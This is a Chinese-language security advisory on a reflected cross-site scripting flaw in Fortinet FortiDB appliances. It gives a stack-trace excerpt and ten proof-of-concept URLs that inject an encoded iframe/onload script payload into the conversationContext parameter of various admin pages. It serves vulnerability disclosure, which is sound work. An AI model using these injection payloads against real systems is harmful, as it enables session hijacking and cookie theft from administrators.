安全研究
安全漏洞
多个Fortinet FortiDB 2kB 1kC & 400B设备跨站脚本漏洞
发布日期:2012-12-03
更新日期:2012-12-04
受影响系统:
Fortinet FortiDB Appliances 2000B 1000C & 400B描述:
BUGTRAQ ID: 56775
Fortinet FortiDB Appliances是数据库安全和合规性平台。
FortiGates FortiDB Appliance 2000B 1000C & 400B由于输入验证不严而存在跨站脚本漏洞。该漏洞位于Java Number Format Exception Handling模块的output listing函数。要成功攻击者利用此漏洞需要中低级用户权限。远程攻击者可通过引诱用户点击恶意链接来进行攻击,成功利用此漏洞可在受影响浏览器中执行HTML和脚本代码,窃取Cookie凭证等。
<*来源:Benjamin Kunz Mejri
链接:http://packetstorm.wowhacker.com/1212-exploits/VL-558.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Proof of Concept:
=================
The vulnerability can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ...
Review: Java Number Format Exception-Handling - Listing [Output] Error
<pre class="errorExceptionCause">java.lang.NumberFormatException:
For input string: ""><[NON PERSISTENT SCRIPT CODE!]")' <"="" at="" java.lang.numberformatexception.
forinputstring(numberformatexception.java:48)="" java.lang.long.parselong(long.java:410)=""
org.apache.myfaces.orchestra.conversation.conversationmanager.findconversationcontextid(conversationmanager.java:157)=""
org.apache.myfaces.orchestra.conversation.conversationmanager.getcurrentrootconversationcontext(conversationmanager.java:564)=""
org.apache.myfaces.orchestra.lib.jsf.contextlockrequesthandler.init(contextlockrequesthandler.java:87)=""
org.apache.myfaces.orchestra.lib.jsf.orchestrafacescontextfactory$1.<init="">
(OrchestraFacesContextFactory.java:119)
at ...
PoC:
http://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 解析java number format exception output listing & mkey application值
厂商补丁:
Fortinet
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
https://www.fortinet.com/
浏览次数:3811
严重程度:0(网友投票)
绿盟科技给您安全的保障